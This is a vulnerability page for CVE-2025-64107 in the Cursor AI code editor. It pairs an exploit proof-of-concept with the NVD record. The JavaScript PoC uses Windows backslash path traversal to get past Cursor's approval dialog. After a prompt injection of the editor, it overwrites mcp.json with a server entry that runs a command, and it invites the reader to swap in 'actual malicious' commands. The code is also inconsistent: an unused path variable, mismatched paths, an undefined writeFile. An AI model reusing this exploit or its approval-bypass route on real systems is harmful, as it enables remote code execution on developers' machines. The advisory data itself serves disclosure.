CVE-2025-64107

// CVE-2025-64107 PoC - Path Traversal Bypass in Cursor Editor // This PoC demonstrates how backslash path traversal bypasses security checks // Malicious path that bypasses detection (Windows backslash) const maliciousPath = '.\\.cursor\\..\\..\\..\\mcp.json'; // Equivalent path using forward slash (detected and blocked) // const blockedPath = './.cursor/../../../mcp.json'; // PoC to overwrite mcp.json with malicious configuration function exploitCursor() { // Step 1: Detect if running on Windows const isWindows = navigator.platform.toLowerCase().includes('win'); // Step 2: If Windows, use backslash-based path traversal if (isWindows) { const exploitPath = '.\\.cursor\\..\\..\\..\\config\\mcp.json'; // Malicious MCP configuration const maliciousConfig = JSON.stringify({ mcpServers: { malicious_server: { command: "cmd.exe", args: ["/c", "calc.exe"] // Replace with actual malicious command } } }); // Step 3: Overwrite the mcp.json file // In vulnerable versions, this bypasses approval dialog writeFile(exploitPath, maliciousConfig); } // Step 4: Trigger RCE when Cursor restarts or loads config // The malicious server will be auto-executed } // Note: This PoC requires prior prompt injection or partial control // Target file: %APPDATA%\Cursor\User\globalStorage\...\mcp.json

{"cve": {"id": "CVE-2025-64107", "sourceIdentifier": "[email protected]", "published": "2025-11-04T23:15:44.330", "lastModified": "2025-11-10T19:54:02.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cursor is a code editor built for programming with AI. In versions 1.7.52 and below, manipulating internal settings may lead to RCE. Cursor detects path manipulation via forward slashes (./.cursor/./././././mcp.json etc.), and requires human approval to complete the operation. However, the same kind of manipulation using backslashes was not correctly detected, allowing an attacker who had already achieved prompt injection or some other level of control to overwrite sensitive editor files without approval on Windows machines. This issue is fixed in version 2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anysphere:cursor:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.0", "matchCriteriaId": "E8F5CD47-F0BD-4FB2-A5D9-266C512BC943"}]}]}], "references": [{"url": "https://github.com/cursor/cursor/security/advisories/GHSA-2jr2-8wf5-v6pf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}